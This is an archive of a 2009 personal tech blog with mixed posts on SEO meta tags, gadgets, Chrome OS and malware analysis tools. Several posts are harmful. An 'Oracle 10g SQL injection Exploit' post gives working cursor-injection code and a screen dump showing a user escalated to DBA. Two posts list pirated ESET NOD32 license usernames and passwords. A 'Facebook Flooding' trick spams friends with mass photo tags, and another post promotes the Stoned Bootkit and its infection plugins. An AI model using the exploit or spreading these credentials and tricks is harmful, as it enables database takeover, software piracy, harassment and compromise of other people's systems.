Saturday, December 5, 2009

New Movable type Of SEO

Ok, so this post might be a sell out, but since none of the movable type seo advice tutorials I've seen so far do it right I thought it was time for someone (me) to do better. I assume you have done some research so I won't go through the purpose of the meta tags. In this example I will be adding author, keywords and description meta tags.

In your entry template find the line <mtsetvarblock name="html_head"> and add the following lines.
<meta name="author" content="<$MTEntryAuthor$>" />
<meta name="keywords" content="<$MTEntryKeywords encode_html="1"$>" />
<meta name="description" content="<$MTEntryExcerpt encode_html="1"$>" />
Do the same for the page template, but use the variables MTPageAuthorDisplayName, MTPageKeywords and MTPageExcerpt.

The final result should look like

[Entry template]

-------------------------------------------------------------------------------------------------------------------------

<mtsetvarblock name="html_head">

<meta name="author" content="<$MTEntryAuthor$>" />

<meta name="keywords" content="<$MTEntryKeywordsencode_html="1"$>" />

<meta name="description" content="<$MTEntryExcerpt encode_html="1"$>" />

-------------------------------------------------------------------------------------------------------------------------

[Page template]

-------------------------------------------------------------------------------------------------------------------------

<MTSetVarBlock name="html_head">

<meta name="author" content="<$MTPageAuthorDisplayName$>" />

<meta name="keywords" content="<$MTPageKeywords encode_html="1"$ >" />

<meta name="description" content="<$MTPageExcerpt encode_html="1"$>" />

-------------------------------------------------------------------------------------------------------------------------

The big difference between my method and most others is that I supply the encode_html directive. This means that if your entry contains html tokens, such as the double quote (") it will be encoded as &qout; inside the meta tags, rather than breaking your html which the " by itself would do.

For the index lists, such as the index page, archives, author entry list and so forth I would recommend using static content for seo. The reason for this is that the MT tags we have just used are context sensitive. So if you used the entry tags in the author list it would only display the content of the last entry for this author due to the context.

Friday, November 27, 2009

Google Wave Invitation

I can Invite about 30 people for a google wave account...!!
if you are interested just reply your email ID...!!
For detail about Google Wave Click Here...

Sunday, November 1, 2009

Now Move From Wordpress Please Follow Me.

Now Move From Wordpress Please Follow Me


 



Click Here


 



I will Update More Useful security tools & Computer Tricks Please Follow Me HERE

NOD32 Keys

Username:TRIAL-23779717
Password:5uef66uupb

Username:TRIAL-23779721
Password:3vupvk7×73

Username:TRIAL-23883159
Password:urfpd8uhe3

Username:EAV-22819751
Password:e2d3xbhcmm

Username:EAV-22819754
Password:xtk5sxtadv

Username:EAV-23369964
Password:4×3kb5rej4

Username:EAV-23546466
Password:mem57djuh6

Username:EAV-17446823
Password:c56dbs7jjd

Username:EAV-23485187
Password:ntebmedu2v

Username:TRIAL-23649878
Password:fkr3nvpj3s

Username:TRIAL-23649887
Password:fbmd5jme33

Username:TRIAL-23779708
Password:x38rt3muuh

Username:EAV-23624052
Password:2nc8p56xnb

Username:EAV-23540739
Password:exkx8ba4dh

Username:EAV-23540757
Password:mhp3fb5dav

Username:EAV-23540772
Password:3st3h58d76

Username:EAV-23540790
Password:u7rxsb4hb5

Username:EAV-23540793
Password:bchuxnrmjt

Username:EAV-23540802
Password:7fb6mjhmp3

Username:EAV-23540814
Password:6kn7j2xhdj

Username:EAV-23540815
Password:sde3j7xbn5

Wednesday, September 30, 2009

3D Printer || To Print Objects in 3D From Your Desktop



magine running back in time a couple of decades ago. Virtually, only hi-profile businesses and offices luxuriously furnished with glass ware could afford to buy a printer for their desktop or office work.

20 years later, into the present, a colossal change in the technology and time makes printers very affordable and coarse to commoners.Well, that’s about the regular 2D printers that we have using to print our office documents or recorded pictures, etc for a long time. But, how about printing an object in 3D?


Imagine printing a cell phone case or a London Bridge replica for your child’s school project which looks as real as you desire at just a few clicks. Wouldn’t it be great?


No, we are not talking about making a clay model of something, painting it with some color and letting it dry until you realize that you’ve actually built something that does not even slightly resemble to what you actually wanted.


Mcor Technologies, a world famous organization excelling in 3D printing solutions has launched a revolutionary that can print literally all the objects you on your desktop. It looks like a microwave oven and can print even burgers and pizzas easily (but definitely not the ones you would like to eat).


The process is really simple. The Matrix uses A4 paper as its raw material to create a . First, a water soluble adhesive is applied between sheets of paper to combine and reinforce them. Then, the unnecessary part of the design is sliced off by the Tungsten Carbide Blade into the printer which leaves a 3D image stacking up to form model, one page at a time.




As the process of is complete, the obtained product is not as rigid and solid as the final product. So, the 3D image is left to hardening and reportedly it resembles wood in its feel and constituency.
ABC



To use color for 3D , color papers can be used. Another popular way of modelling 3D objects is by using a 3D scanner


to scan the desired object first and then printing it using a after the required remodelling is done.

Facebook’s Plan To Trounce Orkut In India



With the growing market of internet users in the country, India has become a battlefield for social networks. Google-owned Orkut has long been the most popular social network in India, with Facebook fighting to catch up. But Facebook has been upping the ante over the past few months, and according to August’s ComScore numbers, the plan may be working. In August, Orkut’s unique visitors in India dipped by 800,000 within a month, from 16 million visitors in July to 15.2 million visitors in August. On the other hand, Facebook grew its unique visitors in India by 700,000, from 7.5 million visitors in July to 8.2 million visitors in August.

This the largest drop in unique visitors Orkut has seen in India over the past year, while Facebook has been steadily growing each month. In fact, Facebook’s audience in India is up 228 percent from a year ago, compared to a 35 percent annual gain for Orkut.

There are a couple of key factors that could be attributed to Orkut’s recent drop in visitors. First, in India, Facebook has been pushing out an aggressive campaign on its social network to get users to import their friends from Orkut with a special Orkut import tool. It basically lets them find friends on other social networks, like Orkut, who are also on Facebook and makes it easy to send a friend requests to those contacts. The purpose of the tool is to make it easy for users to quickly find new friends and establish their social presence on Facebook. The social network offers this in the U.S. for Gmail, AIM and other contact platforms. But this new tool in India is for Orkut specifically. Facebook users are also seeing is the Orkut contact importer in Brazil, Orkut’s home base and stronghold where Facebook is clawing for market share.

Another reason for Facebook’s growth in India could be the recent launch of Facebook Lite. India was one of the original target markets for the lightweight version of the social network, since it is particularly useful in developing countries where high speed Internet connections are sparse or non-existent.

Facebook has been eying India’s huge market and steadily adding features that help the social network establish its reach in the growing country. For example, Facebook launched availability for several Indian languages including Hindi, Punjabi, Bengali, Telugu, Tamil and Malayalam, in May of this year.

It’s plainly obvious that Facebook is growing fast in India and could quite possibly overtake Orkut in the next few months. Meanwhile, other social networks are dropping like flies in the race; with Yahoo shutting down SpotM and MySpace considering layoffs in India because of the its lack of traction among users.

Saturday, September 12, 2009

Facebook Flooding

With Help Of This Trick Your Facebook Friends Will Get above 75 mails from Facebook..!!

facebook

For This Trick You Have To Work On Mozilla FireFox
Add Below Add-Ons its User Agent.


https://addons.mozilla.org/en-US/firefox/addon/59

Now What is User Agent?


User agent is the generic term used to describe any device which might access a web page. User agents include web browsers such as Firefox or Internet Explorer, search engine robots, handheld devices including mobile phones,


Now Login Into Your Facebook Account


Add Given Application


http://apps.facebook.com/pickupfriends/

allow this application
now in mozilla menubar go to Tools-->Default User Agent --> Search Robots --> GoogleBot2.1

now on above application page Click On Make A New Photo

then page every time refreshed & generate New Photo With Tagging Your Friend...!!
if It Will Stop Refreshing after Some time then Change Search Robots to MSNBot & again Click On Make A New Photo...
Do it & Put your Number of Photos ScreenShot Here..!!

Thursday, August 13, 2009

Stoned Bootkit: Attack your Windows

Old news, but still VERY important. At the recently concluded BlackHat 2009 USA, the Stoned Bootkit was released by Peter Kleissner.

The Stoned Bootkit has full access to the system and is able to bypass any security check done by Windows. Why is this dangerous and useful at the sametime? Because- first, it has an open source architecture. Second, it loads into the computer memory before Windows does! Third, it can work on any platform - Windows XP and onwards. Fourth, it can attack the TrueCrypt full volume encryption. Now, ain’t that nasty? It sure is. Wait till you read some more about it. This is it’s feature list:
- attacks Windows XP, Sever 2003, Windows Vista, Windows 7 with one single master boot record
– attacks TrueCrypt full volume encryption
– has integrated FAT and NTFS drivers
– has an integrated structure for plugins and boot applications (for future development)
- is a Master Boot Record, with the target to be memory resident up to the Windows Kernel
- supports the IA32, AT Architecture (IBM-conforming)
- has rich API support
- supports the following boot methods: Floppy, Hard Disk, CD/DVD/Blu Ray, Network (PXE), USB flash drives, and others!

As it is said in the features list, it supports the plugin architecture. Since its architecture is open source, you can build as many plugins you want depending on your requirements. Here is a list of plugins that is pre-shipped with the Stoned BootKit:

  • User Interface

  • CO2-Plugin

  • PE Infector

  • File Parsers

  • HibernationFile Attack

  • PagefileInjector

  • Music Melody!

  • BootPassword Crack

  • AntiWPA

  • Persistent BIOSInfector


In addition to these plugins, it has the following softwares:

  • Forensic Lockdown Software (provides an interface for some operations like a boot menu, original MBR restoration and of course (experimental) locking/unlocking methods.)

  • Hibernation File Attack (uses the bootkit functions to open and modify the hibernation file and to compress and decompress the buffers using the xpress algorithm.)

  • Sinowal Loader (loads and executes the Sinowal kernel driver from the file system.)


If you want, you can also check how it works using QEmu, Bochs or VMWare! The Stoned Bootkit project name was actually inspired by the Stoned virus, the first MBR virus which can infect the Windows XP MBR too. The project itself is built upon the Hibernation File Attack, which was built by the author in the past. The only catch in its installation is that it will need an Administrators access to infect a Windows XP system and an Elevated Administrator access to infect a Windows Vista.

The author plans to add more functionality to the further versions by adding features like polymorphism and metamorphism. The target of Stoned is to be the most sophisticated and most widespread used bootkit in 2010!

You can download the Stoned Bootkit here and read more about it on its homepage here.

Monday, August 10, 2009

free web hosting...get your domain now.!!



Hi all,

I think this information can be useful for you. If you plan to get your website, here is one good free web hosting provider to choose - 000webhost.com

Free cPanel Web Hosting with PHP5/Mysql - no advertising!
Register now: http://www.000webhost.com/193324.html

We can offer you a free web hosting package packed with advanced features for hosting & building professional dynamic websites. We provide secure free web space with all the web hosting tools you could possibly ever need.

Our package includes:
- 1500 MB of Disk Space, 100 GB Bandwidth
- Host your own domain (http://www.yourdomain.com)
- cPanel Powered Hosting (you will love it)
- Over 500 website templates ready to download
- Easy to use website builder
- Free POP3 Email Box with Webmail access
- FTP and Web based File Manager
- PHP, MySQL, Perl, CGI, Ruby.
- And many more..

Click here to visit us: http://www.000webhost.com/193324.html

Thursday, August 6, 2009

Online Earn -- Redeem Gifts

The site is called Lockerz!!

Log in and answer a daily question to get like, 10 points~
You can get gifts like games, clothing and they offer tickets to HUGE concerts.

The site launches publicly October 15th, so you can't sign up regularly, You must be invited!!

I got a few e-mail invites left to send out.

When you sign up you get a chance to play this game, where you move a basket around and catch falling points. I got 28 to start.Its too bad compare to others. be careful at first time get maximum in first try....!!

Stuff here is really cheap, Wii/360 games are like 35-50 points total. Wii's are 250 points, Macbooks are 1000 points, etc.

Leave your e-mail here, or PM me and i'll send you an invite!

online on yahoo messenger: jacky_engg@yahoo.co.in

Wednesday, August 5, 2009

Photoshop White Color Problem

I recently Downloaded Adobe Photoshop CS3

while installing an error related to my Samsung LCD

samsung-error

me little confused coz i installed photoshop many times but never seen this monitor related problem as a user i click on Use Anyway...........

but while editing some pictures a strange problem didn't  get White color.

i checked all color setting even try R:255 G:255 B:255 still color was creamy / Yellow.

photo colour

but i mess with photoshop & get d white color yuppie...!!!
This Problem Due To Samsumg Drivers...if you have same problem Remove Samsung Driver

& then Do Reset Preferences in photoshop.

A lot of Photoshop problems can be fixed by dumping the preferences file: While launching Photoshop, Hold down Alt+Ctrl+shift on the PC or Cmd+Option+Shift on the mac. When asked to reset the preferences say yes.

After that if first message related to samsung monitor , wisely choose "Ignore Profile".
**Before you do this, save your custom Patterns, actions, styles, brushes, gradients, shapes and color pallettes. These will also be reset. Tip: You can create an action to do this, so you have a one click backup!

Sunday, August 2, 2009

India's lightest nano satellite 'Jugnu'

Kanpur: The Indian Institute of Technology (IIT), Kanpur has come in to agreement with the Indian Space Research Organization (ISRO) to launch a nano satellite. It will be the country's lightest and the institute's first satellite to be launched in the orbit from Sriharikota.

IIT Kanpur had presented the second design review to ISRO which nodded to launch the satellite.

"Though the memorandum of understanding between ISRO and IIT-K for the project was signed in February, regular review sessions are being carried out by ISRO to check the progress of the project," said Sanjay Govind Dhande, Director, IIT Kanpur.

"On Tuesday, our technical team working on the project apprised ISRO authorities of the release and antenna mechanism," he said.In April, the first review of Jugnu was carried out by ISRO.

Since last December, a team of 40 students and around 12 professors, led by Professor and Mechanical Engineering Department Head, Nalinaksh S Vyas have been working on the project.

"A similar project in any European country would have cost over Rs 10 crore but we expect the entire project to complete within a budget of Rs 2-3 crore, without compromising on quality. This is a welcome signal for indigenous remote sensing technologies," said Vyas.

A technical team led by D Madhav Murthy in the ISRO for Small Satellite, has said that the procedures for informing the ISRO officials for launch by a mother satellite has been provided, along with the details of the positioning of the satellite antenna set up in the institute premises.

Jugnu weighs around 3.5 kgs and would be 34 cm long and 10 cm wide. Equipped with the micro imaging and micro electronic system, it will transfer the images to the IIT Kanpur campus. The high resolution pictures obtained will be used for different applications like drought monitoring, wasteland management, urban planning and flood risk management.

"Although the stipulated life time of the satellite is six months, we are optimistic that it will complete at least 12 months in the orbit," said Dhandhe.

Saturday, August 1, 2009

Google Bug

Ohh Google....!!

The spelling that I inputed and the correct spelling according to them was same, recursion. Yet they showed me an error!

google bug

GPRS settings

Manual Airtel Gprs Settings (FREE GPRS)
1. Homepage - any page you want to set.
2. User Name - Blank
3. Password - Blank
4. Proxy - Enabled/yes.
5. Proxy and Server Adress - 202.56.231.117
6. Proxy and Server Port - 8080
7. Data bearer - GPRS or Packet Data.
8. Access Point Name - airtelgprs.com
9. Authentication Type - Normal
10. Use preferred access point - No

Airtel live settings


1. Account Name - Airtel_live
2. Homepage - http://live.airtelworld.com
3. Username - Blank
4. Password - Blank
5. Proxy - Enabled/yes
6. Proxy and Server Adress - 100.1.200.99
7. Accespoint Name - airtelfun.com
8. Proxy and Server Port - 8080
9. Data bearer - GPRS/ Packet Data
10. Authentication Type - Normal

Idea_GPRS {FREE GPRS}

1. Account Name - idea_GPRS
2. Username - Blank
3. Password - Blank
4. Homepage - http://wap.ideafresh.com
5. Proxy and Server Port - 8080
6. Proxy and Server adress - 10.4.42.45
7. Databearer - GPRS / Packetdata
8. Acces Point Name - imis
9. Proxy - Enabled/yes
10. Authentication Type - Normal

Bsnl Gprs Settings

1. Account Name - BPL WAP
2. Username -
3. Password -
4. Proxy - Enabled/yes
5. Homepage - http://wap.mizone.bplmobile.com
6. Proxy and Server address - 10.0.0.10
7. Proxy and Server Port - 8080
8. Acces Point Name - mizone
9. Data bearer - GPRS/ Packetdata
10. Authentication Type - Normal

Thursday, July 23, 2009

Intel Upcoming Processors

Intel's Upcoming Core i3, i5, i7 Lineups Unveiled.

intel_core_i7

As some of you probably already know, Intel is preparing the launch of its new mainstream processors, most of which are based on the company's next-generation Lynnfield core. These new CPU models have been designed for the company's LGA 1156 socket, meaning that motherboard makers will have their work cut out for them, trying to gain more market share with the new boards. On that note, it appears that we now have a more complete image of what is to come from the Santa Clara, California-based chip maker.

According to a recent news article that surfaced on the HKEPC website, the chip maker's first wave of LGA 1156-compatible processors will include three models, the quad-core Core i5 750, the Core i7 860 and the Core i7 870. The Core i7 models are designed for high-end systems and boast speeds of 2.8GHz and 2.93GHz, respectively, as well as an integrated dual-channel DDR3-1333 memory controller, 8MB of L3 cache and a TDP of 95W. The Core i7 models features support for Hyper-Threading technology (consequently enabling support for multi-threaded applications), while the less powerful and less expensive Core i5 will be clocked at 2.66GHz and will have no Hyper-Threading feature.

6691a5d3

Later on, in the first quarter of 2010, the company is said to be planning to launch the energy-efficient models (at 82W TDP) of the aforementioned Core i5 750 and Core i7 860, with prices said to start at US$259 and US$337, respectively.

As for the company's 32nm lineup, Intel looks to announce the first 32nm LGA 1156-based processors in Q1 2010, making them available in six flavors, all of which will be dual-core processors with DirectX 10-integrated graphics processor, a DDR3-1333 memory controller and a TDP of 73W. The six will be part of both Core i3 and Core i5 series, with two models in the Core i3 family, three in the Core i5 series and one in the Pentium family.

ZooZoo & PUG Wallpapers

Click On Image To Download Wallpaper...........

zoozoo10zoozoo11


zoozoo11 zoozoo21

zoozoo3 zoozoo4

zoozoo5 zoozoo6

zoozoo7zoozoo8

zoozoo9zoozoo1

zoo1zoo2

zoo3

Now vodafone advertises back with PUG dog...!!

















Sunday, July 19, 2009

Installing pre-backtrack 4 iso in VMware

In this tutorial we are going to install backtrack 4 Pre Final due to they have not released one & it is faster to use in VMware.

Need to Download


1) Vmware player

2) Backtrack4 pre final iso

3) Qemu ( for installing from windows)

----------------------------------------------------Step One---------------------------------------------------

Start a command prompt and cd to the installation directory of QEMU, for example:

cd C:\Program Files\Qemu

and create a VMware disk file as follows:

C:\Program Files\Qemu>qemu-img.exe create -f vmdk Backtrack 4 Pre Final.vmdk 2G
Formating 'Backtrack 4 Pre Final', fmt=vmdk, size=2097152 kB

If you copy paste the above line into the command prompt (cmd.exe), do not include the prompt (the text before qemu-img.exe). If you do, you get the following error: 'C:\Program' is not recognized as an internal or external command, operable program or batch file.

A file "Backtrack 4 Pre Final.vmdk" with a maximum disk size of 2G (the actual file is much smaller; about 320 KB) has been created. You might want to move this file to a different folder.

Now, create an empty text file, and rename it to "Backtrack 4 Pre Final.vmx" (use the same name as in the previous step, but use vmx as the extension instead). Open the file in an editor and enter the following values:

.encoding = "UTF-8"
config.version = "8"
virtualHW.version = "7"
scsi0.present = "TRUE"
memsize = "512"
scsi0:0.present = "TRUE"
scsi0:0.fileName = "Backtrack 4 Pre Final.vmdk"
ide1:0.present = "TRUE"
ide1:0.fileName = "/dev/scd0"
ide1:0.deviceType = "cdrom-raw"
ethernet0.present = "TRUE"
ethernet0.connectionType = "nat"
ethernet0.wakeOnPcktRcv = "FALSE"
usb.present = "TRUE"
ehci.present = "TRUE"
sound.present = "TRUE"
sound.fileName = "-1"
sound.autodetect = "TRUE"
mks.enable3d = "TRUE"
pciBridge0.present = "TRUE"
pciBridge4.present = "TRUE"
pciBridge4.virtualDev = "pcieRootPort"
pciBridge4.functions = "8"
pciBridge5.present = "TRUE"
pciBridge5.virtualDev = "pcieRootPort"
pciBridge5.functions = "8"
pciBridge6.present = "TRUE"
pciBridge6.virtualDev = "pcieRootPort"
pciBridge6.functions = "8"
pciBridge7.present = "TRUE"
pciBridge7.virtualDev = "pcieRootPort"
pciBridge7.functions = "8"
vmci0.present = "TRUE"
buslogic.noDriver = "FALSE"
roamingVM.exitBehavior = "go"
displayName = "Backtrack 4 Pre Final"
guestOS = "winxppro"
nvram = "Backtrack 4 Pre Final.nvram"
virtualHW.productCompatibility = "hosted"
ft.secondary0.enabled = "TRUE"
easyInstall.keepFloppy = "TRUE"
tools.upgrade.policy = "useGlobal"

extendedConfigFile = "Backtrack 4 Pre Final.vmxf"

ethernet0.addressType = "generated"
uuid.location = "56 4d 4c a0 66 07 65 10-ce f8 54 ad 27 78 cd d0"
uuid.bios = "56 4d 4c a0 66 07 65 10-ce f8 54 ad 27 78 cd d0"
scsi0:0.redo = ""
vmotion.checkpointFBSize = "134217728"
pciBridge0.pciSlotNumber = "17"
pciBridge4.pciSlotNumber = "21"
pciBridge5.pciSlotNumber = "22"
pciBridge6.pciSlotNumber = "23"
pciBridge7.pciSlotNumber = "24"
scsi0.pciSlotNumber = "16"
usb.pciSlotNumber = "32"
ethernet0.pciSlotNumber = "33"
sound.pciSlotNumber = "34"
ehci.pciSlotNumber = "35"
vmci0.pciSlotNumber = "36"
ethernet0.generatedAddress = "00:0c:29:78:cd:d0"
ethernet0.generatedAddressOffset = "0"
vmci0.id = "662228432"

--------------------------------------------------------Step Two-----------------------------------------------------

Now you have Backtrack running in vmware you need to install you can do this by dragging & dropping the install.sh file
into you terminal then you will get a error about fonts just click continue then go on with the installation.

When you have completed the installation it will ask you to reboot.

Once the machine has rebooted enter the username & password that you created & do not type startx we have to make some fixes
so you can login as root....

So you have entered your username & password we have to next type "sudo su" it will then ask you for your password
enter the password that you login with then it will ask you for a new password set that as "toor"

now all we have left to do is repair the boot splash screen we can do this by typing in "sudo fix-splash" it will ask you if you would like to over wright
enter "y" to confirm you would like to over wright it

then type in reboot to restart the computer

now you can login with root & toor as username & password

-------------------------------------------Best of Luck---------------------------------------------------------------

Data storage bacteria

Normally whenever you think of data storage, the choices that would come to your mind are Hard Disks, flash drives, CD/DVD etc . However the researchers in Japan don’t think that way . The see something that is very much smaller and much more durable – Bacteria , yeah I am talking about those microscopic organisms which you studied about in your Biology classes.

A Japanese university announced scientists there have developed a new technology that uses bacteria DNA as a medium for storing data long-term, even for thousands of years.

Keio University Institute for Advanced Biosciences and Keio University Shonan Fujisawa Campus announced the development of the new technology, which creates an artificial DNA that carries up to more than 100 bits of data within the genome sequence, according to the JCN Newswire.

The universities said they successfully encoded "e= mc2 1905!" -- Einstein's theory of relativity and the year he enunciated it -- on the common soil bacteria, Bacillius subtilis.

While the technology would most likely first be used to track medication, it could also be used to store text and images for many millennia, thwarting the longevity issues associated with today's disk and tape storage systems -- which only store data for up to 100 years in most cases.

The artificial DNA that carries the data to be preserved makes multiple copies of the DNA and inserts the original as well as identical copies into the bacterial genome sequence. The multiple copies work as backup files to counteract natural degradation of the preserved data, according to the newswire.

Bacteria have particularly compact DNA, which is passed down from generation to generation. The information stored in that DNA can also be passed on for long-term preservation of large data files, the scientists said.

Thursday, July 16, 2009

ESET nod32 Keys

ESET nod32 Keys(01-OCT-2009)





UserName: EAV-22247029
Password: 65r56s3cmb

UserName: EAV-22139431
Password: 36faeft5f3

Username: TRIAL-22457353
Password: mva6xe3bbr

Username: TRIAL-22460528
Password: 5crhdk6chj

Username: TRIAL-22318136
Password: v74sp38jx8

UserName: EAV-17440697
Password: 553df2ac7v

UserName: EAV-17442243
Password: fmk8hsjk4v

Username: EAV-22254510
Password: r87v5f2xpr

Username:EAV-21911559
Password:uhkhk2jr27

Username:EAV-17439511
Password:55jpxa6sfj

Username:EAV-20282038
Password:c64a22krun

Username:EAV-20449260
Password:xhhk3j4b4e

Username:EAV-20433592
Password:tm7kdv6vbd

Username:EAV-21587910
Password:8677vhkdk7

Username: TRIAL-22188115
Password: f5enfr4s3d

Username: TRIAL-22318139
Password: t7j3hejnex

Username: TRIAL-22318138
Password: f3bujnjfph

Next Mozilla 3.6 with 64-bits

Mozilla 3.6 upcoming


Any Firefox fan will be quick to point out the open-source browser's numerous advantages over Microsoft's Internet Explorer, including 780 trillion add-ons (slightly exaggerated), better Web standards support, and arguably better performance and security. But one thing IE has that Firefox doesn't is a 64-bit browser, at least for the time being.

While no official 64-bit version of Firefox yet exists, one Firefox contributor who goes by the online alias Makoto has already ported both Firefox 3.0 and 3.5 to 64-bit editions, and has announced plans to do the same for versions 3.6 and up. If he holds true to his promise, it could mean official 64-bit builds might become a reality with Mozilla's next release, especially since Mozilla has talked about adding 64-bit support in the near future.

It might seem like a minor update, but a 64-bit build translates into faster speeds when logging onto sites using encryption (think of online banking), better memory management, and an overall snappier feel.

Tuesday, July 14, 2009

Malware Analyzing - Tools

What is malware?

I think you all know what malware is but lets start with some well known definitions:
Malware is software designed to infiltrate or damage a computer system without the owner's informed
consent. The expression is a general term meaning a variety of forms of hostile, intrusive, or annoying software or program code. Simply put, Malware is software designed to make a computer do something an attacker wants it to do. It is not always designed to destroy a computer. It may, for example, just sit on a computer, using processor cycles to crack the encryption of a certain file.

Tools for analysing malware (free and open source):

Tools
There are many different tools available that will help you analyze malware. Some of this tools are designed specially for debugging, and analyzing software, others are designed to better understand your
system. I will list some free and open source tools that can be helpful for basic malware analysing and research.

Microsoft Sysinternals
Microsoft’s Sysinternals suite is one of the best tools out there to understand your Windows environment. It includes tools such as TCPView, Process explorer, and Autoruns. This suite includes tools that let you see
what processes are running, what ports are open, what files are set to run at startup and other things.

http://technet.microsoft.com/en-us/sysinternals/bb842062.aspx

Regshot

Regshot is an open-source(GPL) registry compare utility that allows you to quickly take a snapshot of your registry and then compare it with a second one - done after doing system changes or installing a new software product.

http://sourceforge.net/projects/regshot

Snort
Snort is a free and open source network intrusion prevention system (NIPS) and network intrusion detection system (NIDS) capable of performing packet logging and real-time traffic analysis on IP networks.Snort performs protocol analysis, content searching/matching, and is commonly used to actively block or passively detect a variety of attacks and probes, such as buffer overflows, stealth port scans, web application attacks, SMB probes, and OS fingerprinting attempts, amongst other features.
I think that is very clear why snort is so important in malware analyzing.
http://www.snort.org/

NetCat
Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities
.
For malware research this tool is useful because it can help you to see what are the network connection after malware was installed on the machine.
http://netcat.sourceforge.net/

Software analyzing
While system orientated tools (sysinternals, netcat, etc..) helps you to understand the environment, software orianted tools helps you to understand the software. They usualy require you to understand assembly language ( I suggest you watch Vivek's Assembly primer videos). For software analysis we use debuggers. Debuggers are tools (software) that are used to analyze binaries and the output of such analysis is in low level format. I will mention only one tool for such purpose, and that is OllyDbg.It is efficient and
has many plugins available to extend its usefulness.

OllyDbg
OllyDbg is a 32-bit assembler level analysing debugger for Microsoft Windows. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable.
http://www.ollydbg.de/

Remove Malware

Use Malwarebytes Software to remove malwares from your PC......DOWNLOAD

Monday, July 13, 2009

Haiku Free OS


About Haiku OS



Haiku is an open source operating system currently in development designed from the ground up for desktop computing. Inspired by the Be Operating System, Haiku aims to provide users of all levels with a personal computing experience that is simple yet powerful, and void of any unnecessary complexities.


Haiku

As a tool, software is a means to an end, and not an end in itself. The Be Operating System introduced progressive concepts and technologies that we believe represent the ideal means to the end of desktop computing. Haiku will be the realization of those concepts and technologies in the form of an operating system that is open source and free.


Haiku is not a Linux distribution.Haiku is a self-contained operating system that includes a graphical user interface tightly tied to a unique graphics system, all configuration applications, development tools, the GNU tool chain, and a bash terminal.

Thursday, July 9, 2009

Milw0rm.com dead

MILWORM.COM EXISTS ............SORRY ITS BACK AGAIN...!!!


In a sudden announcement, the website's owner (a.k.a Str0ke) broke the news to the world saying he will no longer have the time to manage and update the website.Fresh exploits, video tutorials, online password cracking and more goodies were offered free of charge at Milw0rm. It is with much regret and sadness that we receieve the news.

LAST MESSAGE ON milw0rm.com

"Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past. Be safe, /str0ke"

Milw0rm

Oracle 10g SQL injection Exploit

ORACLE 10g Exploit Example




This is based on cursor injection and does not need create function
privileges:

DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate
 ''grant dba to scott'';commit;end;',0);
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
end;

#----------screen dump--------------------------------------------#
SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
--------------------------- ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO

SQL> DECLARE
2 D NUMBER;
3 BEGIN
4 D := DBMS_SQL.OPEN_CURSOR;
5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction;
begin execute imme
diate ''grant dba to scott'';commit;end;',0);
6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
8 end;
9
10
11 /
DECLARE
*
ERROR at line 1:
ORA-01403: no data found
ORA-06512: at "SYS.LT", line 6118
ORA-06512: at "SYS.LT", line 6087
ORA-06512: at line 7

SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
--------------------------- ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT DBA NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO

Wednesday, July 8, 2009

Clean Your Keyboard

Clean Keyboard With Hair Dryer


When you don't have compressed air, clear tape,Post-It notes, or even white


paper handy, Inc magazine hair_dryersuggests that a standard hair dryer can remove built-up dirt on and under your keys.


The hair dryer is just one of 10 methods Inc.com suggests, with varying degrees of effectiveness and cost. We're a little wary of the CyberClean and USB vacuum suggestions, being both relatively expensive for what they are and a bit single-purpose. Luckily, the hair dryer, heat on or off, fills in for that little USB gadget, if at a much higher, temporary power cost. Other suggestions, like busting out the isopropyl alcohol or entirely removing your keys for a thorough cleaning, are pretty much spot on.

Google Crome Operating System

GOOGLE CHROME OS


Google Chrome OS is an open source, lightweight operating system that will initially be targeted at netbooks. Later this year we will open-source its code, and netbooks running Google Chrome OS will be available for consumers in the second half of 2010.crome OS

Speed, simplicity and security are the key aspects of Google Chrome OS. We're designing the OS to be fast and lightweight, to start up and get you onto the web in a few seconds. The user interface is minimal to stay out of your way, and most of the user experience takes place on the web. And as we did for the Google Chrome browser, we are going back to the basics and completely redesigning the underlying security architecture of the OS so that users don't have to deal with viruses, malware and security updates. It should just work.

Google Chrome OS will run on both x86 as well as ARM chips and we are working with multiple OEMs to bring a number of netbooks to market next year. The software architecture is simple — Google Chrome running within a new windowing system on top of a Linux kernel. For application developers, the web is the platform. All web-based applications will automatically work and new applications can be written using your favorite web technologies. And of course, these apps will run not only on Google Chrome OS, but on any standards-based browser on Windows, Mac and Linux thereby giving developers the largest user base of any platform.

google OSGoogle Chrome OS is a new project, separate from Android. Android was designed from the beginning to work across a variety of devices from phones to set-top boxes to netbooks. Google Chrome OS is being created for people who spend most of their time on the web, and is being designed to power computers ranging from small netbooks to full-size desktop systems. While there are areas where Google Chrome OS and Android overlap, we believe choice will drive innovation for the benefit of everyone, including Google.

We hear a lot from our users and their message is clear — computers need to get better. People want to get to their email instantly, without wasting time waiting for their computers to boot and browsers to start up. They want their computers to always run as fast as when they first bought them. They want their data to be accessible to them wherever they are and not have to worry about losing their computer or forgetting to back up files. Even more importantly, they don't want to spend hours configuring their computers to work with every new piece of hardware, or have to worry about constant software updates. And any time our users have a better computing experience, Google benefits as well by having happier users who are more likely to spend time on the Internet.

